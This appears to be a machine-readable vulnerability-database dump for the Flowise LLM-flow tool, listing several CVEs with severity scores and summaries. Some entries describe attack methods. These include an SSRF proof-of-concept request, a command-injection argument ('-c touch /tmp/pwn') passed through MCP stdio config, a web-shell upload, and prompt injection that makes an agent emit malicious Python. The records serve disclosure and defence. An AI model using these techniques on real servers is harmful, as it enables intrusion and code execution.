url https://api.first.org/data/v1/epss?cve=CVE-2026-41273
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41273
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41273
2
reference_url https://github.com/advisories/GHSA-6f7g-v4pp-r667
reference_id GHSA-6f7g-v4pp-r667
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6f7g-v4pp-r667
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667
reference_id GHSA-6f7g-v4pp-r667
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:33:20Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41273, GHSA-6f7g-v4pp-r667
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-dzed-27rk-3qav
27
url VCID-e65e-s5sd-kuhp
vulnerability_id VCID-e65e-s5sd-kuhp
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the core security wrappers (secureAxiosRequest and secureFetch) intended to prevent Server-Side Request Forgery (SSRF) contain multiple logic flaws. These flaws allow attackers to bypass the allow/deny lists via DNS Rebinding (Time-of-Check Time-of-Use) or by exploiting the default configuration which fails to enforce any deny list. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41272
reference_id
reference_type
scores
0
value 0.00083
scoring_system epss
scoring_elements 0.24454
published_at 2026-06-12T12:55:00Z
1
value 0.00083
scoring_system epss
scoring_elements 0.24258
published_at 2026-06-11T12:55:00Z
2
value 0.00083
scoring_system epss
scoring_elements 0.24447
published_at 2026-06-14T12:55:00Z
3
value 0.00083
scoring_system epss
scoring_elements 0.24464
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41272
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41272
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41272
2
reference_url https://github.com/advisories/GHSA-2x8m-83vc-6wv4
reference_id GHSA-2x8m-83vc-6wv4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2x8m-83vc-6wv4
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2x8m-83vc-6wv4
reference_id GHSA-2x8m-83vc-6wv4
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:18:28Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-2x8m-83vc-6wv4
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41272, GHSA-2x8m-83vc-6wv4
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-e65e-s5sd-kuhp
28
url VCID-ejdc-j73x-jydk
vulnerability_id VCID-ejdc-j73x-jydk
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41269
reference_id
reference_type
scores
0
value 0.00146
scoring_system epss
scoring_elements 0.34914
published_at 2026-06-14T12:55:00Z
1
value 0.00146
scoring_system epss
scoring_elements 0.34734
published_at 2026-06-11T12:55:00Z
2
value 0.00146
scoring_system epss
scoring_elements 0.34935
published_at 2026-06-13T12:55:00Z
3
value 0.00146
scoring_system epss
scoring_elements 0.34912
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41269
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41269
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41269
2
reference_url https://github.com/advisories/GHSA-rh7v-6w34-w2rr
reference_id GHSA-rh7v-6w34-w2rr
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rh7v-6w34-w2rr
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr
reference_id GHSA-rh7v-6w34-w2rr
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:21:08Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41269, GHSA-rh7v-6w34-w2rr
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ejdc-j73x-jydk
29
url VCID-fu6t-9dk4-jbh9
vulnerability_id VCID-fu6t-9dk4-jbh9
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, due to unsafe serialization of stdio commands in the MCP adapter, an authenticated attacker can add an MCP stdio server with an arbitrary command, achieving command execution. The vulnerability lies in a bug in the input sanitization from the “Custom MCP” configuration in http://localhost:3000/canvas - where any user can add a new MCP, when doing so - adding a new MCP using stdio, the user can add any command, even though your code have input sanitization checks such as validateCommandInjection and validateArgsForLocalFileAccess, and a list of predefined specific safe commands - these commands, for example "npx" can be combined with code execution arguments ("-c touch /tmp/pwn") that enable direct code execution on the underlying OS. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-40933
reference_id
reference_type
scores
0
value 0.00074
scoring_system epss
scoring_elements 0.22424
published_at 2026-06-11T12:55:00Z
1
value 0.00074
scoring_system epss
scoring_elements 0.22614
published_at 2026-06-14T12:55:00Z
2
value 0.00074
scoring_system epss
scoring_elements 0.22634
published_at 2026-06-13T12:55:00Z
3
value 0.00074
scoring_system epss
scoring_elements 0.22621
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-40933
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-40933
reference_id CVE-2026-40933
reference_type
scores
url https://nvd.nist.gov/vuln/detail/CVE-2026-40933
2
reference_url https://github.com/advisories/GHSA-c9gw-hvqq-f33r
reference_id GHSA-c9gw-hvqq-f33r
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c9gw-hvqq-f33r
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r
reference_id GHSA-c9gw-hvqq-f33r
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-c9gw-hvqq-f33r
4
reference_url https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem
reference_id mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/
url https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem
5
reference_url https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp
reference_id the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-22T13:20:05Z/
url https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-40933, GHSA-c9gw-hvqq-f33r
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fu6t-9dk4-jbh9
30
url VCID-gt6n-beak-33gy
vulnerability_id VCID-gt6n-beak-33gy
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, all CRUD endpoints for OpenAI Assistants Vector Store have no authentication middleware and the route path /api/v1/openai-assistants-vector-store is not in WHITELIST_URLS. However, it is also not protected by the main auth middleware when accessed via API key — the route requires API key auth (not whitelisted), but no permission checks exist on any operation. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46444
reference_id
reference_type
scores
0
value 0.00088
scoring_system epss
scoring_elements 0.25142
published_at 2026-06-11T12:55:00Z
1
value 0.00113
scoring_system epss
scoring_elements 0.29744
published_at 2026-06-12T12:55:00Z
2
value 0.00113
scoring_system epss
scoring_elements 0.29762
published_at 2026-06-13T12:55:00Z
3
value 0.00115
scoring_system epss
scoring_elements 0.29991
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46444
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46444
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46444
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-06-08T15:54:10Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
3
reference_url https://github.com/advisories/GHSA-hmg2-jjjx-jcp2
reference_id GHSA-hmg2-jjjx-jcp2
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hmg2-jjjx-jcp2
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hmg2-jjjx-jcp2
reference_id GHSA-hmg2-jjjx-jcp2
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-06-08T15:54:10Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-hmg2-jjjx-jcp2
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46444, GHSA-hmg2-jjjx-jcp2
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gt6n-beak-33gy
31
url VCID-gvpx-4wkw-43cz
vulnerability_id VCID-gvpx-4wkw-43cz
summary 
Flowise Execute Flow function has an SSRF vulnerability
### Summary

The attacker provides an intranet address through the base url field configured in the Execute Flow node 
→ Bypass checkDenyList / resolveAndValidate in httpSecurity.ts (not called)
→ Causes the server to initiate an HTTP request to any internal network address, read cloud metadata, or detect internal network services 

### Details

<img width="1280" height="860" alt="9a52a74e6fe2fd78e4962d1d68057fc2" src="https://github.com/user-attachments/assets/20df0006-9129-4886-8928-16d19a617c23" />

Then initiate the call: 

```
POST /api/v1/prediction/d6739838-d3b3-43d9-86ff-911a3d757a7e HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Authorization: Bearer apikey
Content-Length: 17

{"question": "1"}
```

Server received a request:

<img width="1432" height="172" alt="f45c757fec408e13739db068252ff21b" src="https://github.com/user-attachments/assets/d3dfe0f5-83ec-4c79-ab32-754382a68d5f" />

And there is an echo: 

<img width="1280" height="666" alt="fa0caf0deb306cfeeea8fdf8941a287e" src="https://github.com/user-attachments/assets/55a94d25-120b-4e9c-9517-46c2fc2b667f" />

Fix:
Call secureFetch for verification



### Impact

This is a Server-Side Request Forgery (SSRF) vulnerability that may lead to the following risks: 
- Explore Internal Web Applications
- Access sensitive management interfaces
- Leak internal configuration, credentials, or confidential information

This vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in enterprise environments.
references
0
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9hrv-gvrv-6gf2
reference_id
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9hrv-gvrv-6gf2
1
reference_url https://github.com/advisories/GHSA-9hrv-gvrv-6gf2
reference_id GHSA-9hrv-gvrv-6gf2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9hrv-gvrv-6gf2
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases GHSA-9hrv-gvrv-6gf2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gvpx-4wkw-43cz
32
url VCID-hdej-umwh-kqav
vulnerability_id VCID-hdej-umwh-kqav
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, dataset create and update mass-assignment allows cross-workspace dataset takeover. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46477
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.17107
published_at 2026-06-13T12:55:00Z
1
value 0.00053
scoring_system epss
scoring_elements 0.17095
published_at 2026-06-12T12:55:00Z
2
value 0.00053
scoring_system epss
scoring_elements 0.16939
published_at 2026-06-11T12:55:00Z
3
value 0.00059
scoring_system epss
scoring_elements 0.18998
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46477
1
reference_url https://github.com/FlowiseAI/Flowise/commit/49a2259bf2a6b4f3d4b50813cb5161cee0d40040
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/49a2259bf2a6b4f3d4b50813cb5161cee0d40040
2
reference_url https://github.com/FlowiseAI/Flowise/pull/6051
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/6051
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46477
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46477
4
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-06-09T14:28:27Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
5
reference_url https://github.com/advisories/GHSA-5h9v-837x-m97r
reference_id GHSA-5h9v-837x-m97r
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5h9v-837x-m97r
6
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5h9v-837x-m97r
reference_id GHSA-5h9v-837x-m97r
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-06-09T14:28:27Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5h9v-837x-m97r
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46477, GHSA-5h9v-837x-m97r
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hdej-umwh-kqav
33
url VCID-hkfs-v3bp-kbh5
vulnerability_id VCID-hkfs-v3bp-kbh5
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41265
reference_id
reference_type
scores
0
value 0.0033
scoring_system epss
scoring_elements 0.56461
published_at 2026-06-13T12:55:00Z
1
value 0.0033
scoring_system epss
scoring_elements 0.5645
published_at 2026-06-14T12:55:00Z
2
value 0.0033
scoring_system epss
scoring_elements 0.56326
published_at 2026-06-11T12:55:00Z
3
value 0.0033
scoring_system epss
scoring_elements 0.56446
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41265
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41265
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41265
2
reference_url https://github.com/advisories/GHSA-v38x-c887-992f
reference_id GHSA-v38x-c887-992f
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v38x-c887-992f
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f
reference_id GHSA-v38x-c887-992f
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T20:16:20Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-v38x-c887-992f
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41265, GHSA-v38x-c887-992f
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hkfs-v3bp-kbh5
34
url VCID-j5hh-haj2-qydg
vulnerability_id VCID-j5hh-haj2-qydg
